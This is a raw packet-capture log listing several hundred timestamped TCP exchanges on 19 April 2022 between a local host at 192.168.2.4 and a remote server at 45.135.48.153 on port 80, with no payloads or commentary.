Apr 19, 2022 16:44:44.226463079 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.226502895 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.226587057 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.226783037 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.226802111 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.226844072 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.226927996 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.226974010 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.226985931 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.227225065 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.227242947 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.227293015 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.227375031 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.227428913 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.227509975 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.227658033 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.227826118 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.227843046 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.227876902 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.227910042 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.227983952 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.228146076 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.228163958 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.228195906 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.228358030 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.228375912 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.228404045 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.228630066 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.228648901 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.228703022 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.228831053 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.228849888 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.228892088 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.229027987 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.229047060 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.229074955 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.229266882 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.229285002 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.229331017 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.229435921 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.229480028 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.229568005 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.229584932 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.229665041 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.229780912 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.229918003 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.229937077 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.230097055 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.230150938 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.230185032 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.230245113 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.230367899 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.230467081 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.230494976 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.230617046 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.230674028 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.230680943 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.230829000 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.230846882 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.230895042 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.231004953 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.231060982 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.231115103 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.231280088 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.231467009 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.231483936 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.231513023 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.231538057 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.231651068 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.231667995 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.231708050 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.231791019 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.231981993 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.231998920 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.232044935 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.232136011 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.232177019 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.232283115 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.232300043 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.232341051 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.232541084 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.232559919 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.232784033 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.232800961 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.232827902 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.232851982 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.232940912 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.233150005 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.233167887 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.233197927 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.233280897 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.233319998 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.233405113 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.233423948 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.233473063 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.233720064 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.233737946 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.233783007 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.233793974 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.234015942 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.234035015 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.234076023 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.234169960 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.234214067 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.234306097 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.234472036 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.234491110 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.234659910 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.234698057 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.234715939 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.234778881 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.234946966 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.234966040 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.235011101 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.235194921 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.235213995 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.235249043 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.235332966 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.235390902 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.235399008 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.235560894 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.235641003 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.235652924 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.235867977 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.235886097 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.235933065 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.236004114 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.236052036 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.236182928 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.236202002 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.236257076 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.236304045 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.236465931 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.236521006 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.236581087 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.236762047 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.236779928 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.236815929 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.236860037 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.236912012 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.237112999 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.237129927 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.237304926 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.237322092 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.237349033 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.237371922 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.237550974 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.237567902 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.237610102 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.237788916 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.237807035 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.237853050 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.237993002 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.238010883 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.238267899 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.238285065 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.238311052 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.238336086 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.238441944 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.238459110 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.238498926 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.238670111 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.238687992 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.238734007 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.238874912 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.238892078 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.239135027 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.239151955 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.239178896 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.239202976 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.239351034 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.239368916 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.239409924 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.239562988 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.239581108 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.239633083 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.239667892 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.239913940 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.239932060 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.239984035 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.240155935 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.240174055 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.240200996 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.240391970 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.240408897 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.240437031 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.240601063 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.240619898 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.240648985 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.240832090 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.240849018 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.240871906 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.241162062 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.241214037 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.241216898 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.241281033 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.241319895 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.241359949 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.241535902 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.241575956 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.241619110 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.241734028 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.241775990 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.241817951 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.241964102 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.242002964 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.242011070 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.242250919 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.242315054 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.242356062 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.242387056 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.242414951 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.242459059 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.242583990 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.242784977 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.242794037 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.242825985 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.242866039 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.242933989 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.243043900 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.243263960 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.243267059 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.243304968 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.243347883 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.243360043 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.243498087 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.243601084 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.243664026 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.243726015 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.243813992 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.243860006 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.244008064 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.244048119 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.244066954 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.244235039 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.244277954 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.244328976 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.244441032 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.244482040 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.244504929 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.244699955 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.244740963 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.244795084 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.244941950 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.244985104 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.245042086 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.245121002 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.245162010 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.245171070 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.245368958 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.245410919 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.245462894 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.245601892 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.245651960 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.245687962 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.245728016 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.245852947 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.245903969 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.245939970 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.245981932 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.246099949 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.246283054 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.246325970 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.246371031 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.246408939 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.246449947 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.246546984 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.246737003 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.246778011 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.246834993 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.246972084 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.247009993 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.247014999 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.247128010 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.247298002 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.247339964 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.247492075 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.247502089 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.247541904 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.247684002 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.247746944 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.247839928 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.247881889 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.247924089 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.248104095 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.248151064 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.248166084 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.248254061 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.248459101 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.248487949 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.248503923 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.248538017 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.248555899 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.248670101 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.248872042 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.248902082 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.248914003 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.248950005 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.248967886 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.249180079 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.249242067 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.249281883 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.249393940 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.249433041 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.249464989 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.249717951 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.249747038 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.249785900 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.249787092 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.249825001 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.249918938 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.250116110 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.250143051 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.250197887 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.250288010 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.250329018 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.250473976 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.250499964 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.250633955 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.250682116 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.250798941 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.250827074 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.250840902 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.250993967 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.251020908 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.251065969 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.251164913 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.251204967 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.251286983 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.251481056 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.251507998 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.251559973 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.251636028 CEST	80	49758	45.135.48.153	192.168.2.4
